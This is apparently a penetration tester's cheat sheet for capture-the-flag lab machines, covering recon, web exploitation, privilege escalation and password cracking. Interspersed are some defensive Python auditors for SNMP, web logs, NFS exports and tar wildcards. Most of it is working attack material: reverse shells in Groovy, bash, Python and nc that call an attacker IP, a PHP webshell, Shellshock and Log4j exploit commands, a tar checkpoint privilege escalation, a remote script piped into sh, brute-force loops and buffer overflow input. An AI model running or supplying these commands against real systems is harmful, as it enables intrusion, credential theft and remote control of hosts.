Pentester's Notes


Published: at 07:57 AM


Recon

NMAP

# to get all ports
nmap -p- -T4 10.10.135.68 -v 
sudo nmap -sS -p- -T4 10.10.240.251 -v
# scan the open ports in more depth
nmap -p22,80 -sS -sC -sV 10.10.135.68 -v
ls /usr/share/nmap/scripts/ | grep smb

Dirb

dirb http://10.10.135.68/

Gobuster

gobuster dir -u http://seasurfer.thm/ -w /usr/share/wordlists/dirb/big.txt

Nikto

nikto -h 10.10.135.68

Wfuzz

subdomains

wfuzz -c -f sub-fighter -w subd.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz -c -f sub-fighter -w subdomains.lst  -u 'http://nahamstore.thm' -H "Host: FUZZ.nahamstore.thm" --hw 65

In Web Browser

PHP Website

SMB, RDP

smbclient -L 10.10.150.121 -N
smbmap -H 10.10.240.251  
smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  # shares
smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  -r  # things inside shares
enum4linux -a 10.10.240.251
# brute force
crackmapexec smb 10.10.83.74 -u Jareth -p /usr/share/wordlists/rockyou.txt
# get access
evil-winrm -i 10.10.83.74 -u Jareth -p sarah

SNMP

# Community String Brute Force
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/SNMP/snmp-onesixtyone.txt
onesixtyone 10.10.83.74 -c snmp-onesixtyone.txt
# enum snmp
snmp-check -c openview 10.10.83.74
snmpwalk
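As an added defender's check (example code, not part of the original notes), the following audits an snmpd.conf for the settings that make community-string guessing with onesixtyone pay off: default or short community strings, no source restriction, and write access. The configuration text is constructed for the example.

```python
import re

# Community strings that ship as defaults and are the first guesses in any wordlist.
DEFAULT_COMMUNITIES = {"public", "private"}

# rocommunity/rwcommunity COMMUNITY [SOURCE [OID]]   and   com2sec NAME SOURCE COMMUNITY
ACCESS_RE = re.compile(r"^\s*(r[ow]community6?)\s+(\S+)(?:\s+(\S+))?", re.IGNORECASE)
COM2SEC_RE = re.compile(r"^\s*com2sec6?\s+\S+\s+(\S+)\s+(\S+)", re.IGNORECASE)

def audit_snmpd_conf(text):
    """Return (line_number, severity, message) for risky SNMPv1/v2c community settings."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].rstrip()  # drop comments and blank lines
        if not line:
            continue
        m = ACCESS_RE.match(line)
        if m:
            community, source = m.group(2), m.group(3)
            writable = m.group(1).lower().startswith("rw")
        else:
            m = COM2SEC_RE.match(line)
            if not m:
                continue
            source, community = m.group(1), m.group(2)
            writable = False  # access level comes from later group/access lines
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((lineno, "high", f"default community string '{community}'"))
        elif len(community) < 12:
            findings.append((lineno, "medium", f"short community string '{community}' (guessable)"))
        if source is None or source.lower() == "default":
            findings.append((lineno, "medium", "community accepted from any source address"))
        if writable:
            findings.append((lineno, "high", f"write access via '{community}' (use SNMPv3 or read-only)"))
    return findings

# Constructed sample snmpd.conf, not a real host's file.
SAMPLE_CONF = """\
# default net-snmp example
rocommunity public
rwcommunity private 192.0.2.0/24
rocommunity openview
rocommunity Z8m4kq2Lp9Vw3Xr 10.10.0.0/16
com2sec notConfigUser default public
"""

if __name__ == "__main__":
    for lineno, sev, msg in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {lineno}: [{sev}] {msg}")
```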

CMS

Joomla

http://10.10.114.248/joomla//administrator/manifests/files/joomla.xml says that the version is 3.9.12.

/README.txt

An exploit is available at https://www.exploit-db.com/exploits/42033. There is a SQL injection in the following URL: http://10.10.107.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml<SQLI>

Another exploit that can be found: https://github.com/stefanlucas/Exploit-Joomla

RCE is possible

sar2html

/_test hosts sar2html, which is vulnerable to RCE: request /index.php?plot=;<command>, then click "select host". https://www.exploit-db.com/exploits/47204

Wordpress

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress

Users: http://internal.thm/blog/index.php/wp-json/wp/v2/users/

/index.php/comments/feed/ is also worth checking.

XMLRPC

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php

Brute force XMLRPC

#!/bin/bash
# try each password from the wordlist against the admin account via wp.getUsersBlogs
while IFS= read -r pass; do
    echo "$pass"
    curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>$pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php
done < "/usr/share/wordlists/rockyou.txt"

jenkins

/script (the Groovy script console) for RCE

Thread.start {
String host="10.8.97.245";
int port=1234;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

Exploitation

RCE and Reverse shell payloads

php

<?php system($_GET['cmd']);?>

https://github.com/pentestmonkey/php-reverse-shell
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php - PHP Reverse Shell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php - PHP Reverse Shell

bash

/bin/bash -c 'bash -i >& /dev/tcp/10.8.97.245/4444 0>&1'

msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.97.245 LPORT=1234 -f aspx >reverse.aspx

Command Injection

https://book.hacktricks.xyz/pentesting-web/command-injection

/ping?ip=10.8.97.245 %0A ls

LFI

http://10.10.97.188/?view=php://filter/read=convert.base64-encode/resource=dog/../flag - returns the file base64-encoded. Useful when a PHP file is executed instead of returned, so its source cannot be read directly.

SQLi

sqlmap

sqlmap -r aaa.req --dump-all --batch

Shellshock

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://10.10.135.68/cgi-bin/test.cgi 
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /bin/bash -c 'exec /bin/bash -i >& /dev/tcp/10.8.97.245/1234 0>&1'" http://10.10.135.68/cgi-bin/test.cgi 

Log4J

nc -lvnp 9001
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
vim poc.py 
# change /bin/sh to cmd
# the machine is Windows
python3 poc.py --userip 10.10.14.92 --webport 8000 --lport 9001
# then paste  ${jndi:ldap://10.10.14.92:1389/a} in input place
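On the defensive side, the Shellshock requests above, the ${jndi:...} lookup string used against Log4j and the XML-RPC password loop from the WordPress section all leave recognisable traces in a web server's access log. The following triage function is an added example, not part of the original notes: it parses combined-format log lines, flags a bash function definition in the User-Agent of a /cgi-bin/ request, flags JNDI lookups (including URL-encoded and nested forms that hide the keyword), and counts POSTs to xmlrpc.php per source address. The log lines and the threshold of 20 are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")                  # bash function body in a header value
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # plain JNDI lookup string
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")                  # nested lookups that hide the keyword
XMLRPC_THRESHOLD = 20                                      # POSTs to xmlrpc.php per source IP

def triage(lines):
    """Return sorted (ip, finding) pairs for probes visible in access-log lines."""
    findings = set()
    xmlrpc_posts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, _status, ua = m.groups()
        decoded = unquote(unquote(line))  # undo single and double URL-encoding
        if path.startswith("/cgi-bin/") and SHELLSHOCK_RE.search(ua):
            findings.add((ip, "shellshock-probe"))
        if JNDI_RE.search(decoded) or NESTED_RE.search(decoded):
            findings.add((ip, "log4shell-probe"))
        if method == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_posts[ip] += 1
    for ip, count in xmlrpc_posts.items():
        if count >= XMLRPC_THRESHOLD:
            findings.add((ip, f"xmlrpc-bruteforce:{count}"))
    return sorted(findings)

# Constructed sample lines; the addresses and hostnames are documentation values, not real hosts.
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { ignored; }; echo; /usr/bin/id"',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://attacker.example/a}"',
    '192.0.2.1 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
] + [
    f'192.0.2.55 - - [01/Jan/2024:10:01:{i:02d} +0000] "POST /blog/xmlrpc.php HTTP/1.1" 200 400 "-" "curl/8.0"'
    for i in range(25)
]

if __name__ == "__main__":
    for ip, finding in triage(SAMPLE):
        print(ip, finding)
```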

Post Exploitation

Linux

NFS Share

# find available folders
showmount -e 10.10.240.128
# mount 
mkdir /mnt/new_back
mount -t nfs 10.10.240.128:/home/nfs /mnt/new_back -o nolock
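Whether a share like the one mounted above is reachable at all is decided by the server's /etc/exports. As an added defender's check (example code, not from the notes), the following parses an exports file and flags the entries that make an NFS share a post-exploitation gift: exports to any host, no_root_squash, insecure, and the classic "client (options)" typo where the space makes the options apply to everyone. The exports text is constructed for the example.

```python
import re

# One /etc/exports entry: <path> <client>(opts) [<client>(opts) ...].
# A client with no parentheses gets the defaults (ro, root_squash); a bare "*" or a
# "(opts)" token separated from its client by a space applies to every host.
TOKEN_RE = re.compile(r"^([^(]*)(?:\(([^)]*)\))?$")

def audit_exports(text):
    """Return (path, client, issue) triples for risky NFS export entries."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        for token in rest.split():
            m = TOKEN_RE.match(token)
            if not m:
                continue
            client = m.group(1) or "*"
            options = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            anyone = client == "*" or client.startswith("*.")
            if anyone:
                findings.append((path, client, "exported to any host"))
            if "no_root_squash" in options:
                findings.append((path, client, "no_root_squash: remote uid 0 is root on the share"))
            if "insecure" in options:
                findings.append((path, client, "insecure: mounts accepted from unprivileged source ports"))
            if anyone and "rw" in options:
                findings.append((path, client, "writable by any host"))
    return findings

# Constructed sample exports file, not a real host's configuration.
SAMPLE_EXPORTS = """\
/home/nfs *(rw,no_root_squash,sync)
/srv/backups 10.10.0.0/16(ro,sync)
/srv/www 10.10.0.5 (rw,sync)
/srv/data 10.10.0.7(rw,insecure)
"""

if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {client}: {issue}")
```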

Linux PrivEsc Checks

sudo -l
# suid
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# crontab
cat /etc/crontab
# capabilities
getcap -r / 2>/dev/null
# files owned by
find / -user hakanbey 2>/dev/null
find /usr/bin -group hakanbey 2>/dev/null | more
# check network connections
ss -tulpn
# check processes
ps aux | grep root
# check some folders
ls /opt

Linpeas

https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Docker

r00t@ultratech-prod:~$ groups
r00t docker

https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it bash chroot /mnt sh
# whoami
root

If there is no bash image, list the available ones with docker images and use one of them.

Tar and Wildcard

If a backup.sh that runs periodically contains a bare * in a tar command, tar checkpoint actions can be abused: https://www.gnu.org/software/tar/manual/html_section/checkpoints.html

# for example, the script contains this command
tar -zcf /home/kyle/backups/invoices.tgz *

Then create a shell script and the two checkpoint files in the directory being archived:

echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.35.156\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")\'' > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
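The same pattern is easy to audit for. As an added defender's check (example code, not from the notes), the following flags tar commands in a script whose file list is a bare glob, and lists directory entries that would be parsed as options if the glob expanded them onto the command line. It treats the standard GNU tar mitigations, a -- before the file list or a glob written as ./*, as safe. The script and directory listing are constructed for the example.

```python
import shlex

def risky_tar_lines(script_text):
    """Return (line_number, line) for tar commands whose file list is a bare glob.

    A glob such as * is expanded by the shell, so a file named --checkpoint=1 in the
    archived directory lands on tar's command line and is parsed as an option. A glob
    written as ./* or an absolute path, or a -- before the file list, is not flagged.
    """
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        line = raw.split("#", 1)[0]
        try:
            words = shlex.split(line, posix=False)  # keep quotes: a quoted glob is literal
        except ValueError:
            continue
        tar_at = next((i for i, w in enumerate(words) if w.rsplit("/", 1)[-1] == "tar"), None)
        if tar_at is None or "--" in words[tar_at:]:
            continue
        if any(w.startswith(("*", "?", "[")) for w in words[tar_at + 1:]):
            findings.append((lineno, raw.strip()))
    return findings

def option_like_names(names):
    """Return directory entries that would be read as options if they reached a command line."""
    return sorted(n for n in names if n.startswith("-"))

# Constructed backup script modelled on the page's example; the safe variants follow it.
SAMPLE_SCRIPT = """\
#!/bin/bash
cd /home/kyle/invoices
tar -zcf /home/kyle/backups/invoices.tgz *
tar -zcf /home/kyle/backups/logs.tgz -- *
tar -zcf /home/kyle/backups/www.tgz ./*
tar -zcf /home/kyle/backups/etc.tgz /etc/*.conf
"""

# Constructed listing of the archived directory.
SAMPLE_LISTING = ["invoice1.pdf", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh", "shell.sh"]

if __name__ == "__main__":
    for lineno, line in risky_tar_lines(SAMPLE_SCRIPT):
        print(f"line {lineno}: {line}")
    print(option_like_names(SAMPLE_LISTING))
```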

Windows

Better Runas - RunasCs

# for reverse shell
C:\> RunasCs.exe <user> <pass> cmd.exe -r 10.10.14.92:1234

SYSTEM and SAM credential dump

impacket-secretsdump -ts local -system system.bak -sam sam.bak

Potato Attack

https://github.com/ohpe/juicy-potato/releases

JuicyPotato.exe -l 1337 -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe -e cmd.exe 10.8.97.245 4444" -t *

https://github.com/itm4n/PrintSpoofer

PrintSpoofer64.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe -e cmd.exe 10.8.97.245 4444"

HHUPD.EXE

https://sotharo-meas.medium.com/cve-2019-1388-windows-privilege-escalation-through-uac-22693fa23f5f

Brute Force and Password Cracking

john

john hash --wordlist=/usr/share/wordlists/rockyou.txt

FFUF

ffuf -u http://10.10.142.177/api/login -X POST -w userlist.txt:W1,md5_passwords.txt:W2 -H "Content-Type: application/json" -d '{"username":"W1","password":"W2"}' -v -o result

Hydra

hydra -P /usr/share/wordlists/rockyou.txt -l admin  blitz.icsd http-get-form "/:j_username=^USER^&j_password=^PASS^&from=&Submit=:Invalid username or password"

Sucrack

https://github.com/hemp3l/sucrack

cd sucrack
./configure 
make
src/sucrack -u hakanbey -w 100 wordlist.txt

Others

Shell Stabilization

Unix

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

Windows

msfconsole
# then 
use exploit/windows/misc/hta_server
set lhost <ip>
run
# then in windows 
mshta http://10.10.14.92:8080/2ao4a48kDfJgdCl.hta

SSH Port Forwarding

The service listens on port 8080 on the remote host; forward it so it is reachable on local port 8080:

ssh -L 8080:172.17.0.2:8080 [email protected] -N

Socat Port Forwarding

The service listens on port 22 on localhost; forward it so it is reachable on port 2222:

socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22

RDP Connect

xfreerdp /u:Wade /v:10.10.15.65 /p:parzival /dynamic-resolution

Decode Encode

https://cyberchef.io/

Steganography

Steghide

steghide extract -sf somefile.png

Reverse engineering

strings somebinary
ltrace somebinary 

Buffer Overflow

objdump -d -Mintel hacktheworld
echo -n aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > input
echo -n 580640000000 | xxd -r -p >> input 

gdb hacktheworld
(gdb) run < input